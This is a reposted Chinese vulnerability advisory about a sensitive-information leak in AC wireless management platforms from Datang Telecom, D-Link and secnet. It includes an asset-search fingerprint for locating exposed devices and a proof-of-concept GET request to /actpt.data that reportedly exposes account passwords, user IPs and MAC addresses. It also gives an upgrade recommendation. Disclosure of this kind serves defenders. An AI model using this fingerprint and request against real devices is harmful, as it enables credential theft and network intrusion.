文章总结: 该文档披露了AC集中管理平台存在敏感信息泄露漏洞,影响大唐电信、D-Link和secnet安网等多款产品的特定版本。攻击者可通过访问/actpt.data接口直接获取账号密码、用户IP及MAC地址等敏感数据。文章提供了资产测绘语法、漏洞复现POC及升级至最新版本的修复建议,具有较高的安全预警价值和实战参考意义。 综合评分: 70 文章分类: 漏洞分析,漏洞预警,漏洞POC,WEB安全
AC集中管理平台敏感信息泄露漏洞 附POC
原创
安服仔 安服仔
北风漏洞复现文库
2026年3月6日 10:54 广东 标题已修改
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
#
#
01
—
漏洞名称
AC集中管理平台敏感信息泄漏漏洞
#
02
—
影响版本
影响版本:大唐电信AC集中管理平台影响版本为早期未修复的版本、D-Link AC集中管理平台影响版本为<= 1.02.042、secnet安网智能AC管理系统影响版本为<= 1.02.042**
03
—
漏洞简介
AC集中管理平台是一种用于集中管理和控制无线网络中接入点设备的系统平台,主要应用于企业、园区、校园等大规模无线网络场景。该平台通过与无线控制器及AP设备协同工作,实现对多台AC和大量AP的统一配置、监控、运维和管理,具备集中配置下发、分级分权管理、AC集群负载均衡、故障自动切换、网络性能优化等功能,可显著提升无线网络的管理效率、可靠性与稳定性,降低运维成本。AC集中管理平台存在敏感信息泄露漏洞,攻击者可通过特定请求(如访问/actpt.data)获取网关敏感信息,包括账号、密码、用户IP和MAC地址等。
04
—
资产测绘
header="HTTPD_ac 1.0"
05
—
漏洞复现
POC
GET /actpt.data HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Priority: u=0, iPragma: no-cacheCache-Control: no-cache
06
—
修复建议
升级AC集中管理平台软件至最新版本
07
—
往期回顾
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:北风漏洞复现文库 安服仔 安服仔《AC集中管理平台敏感信息泄露漏洞 附POC》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论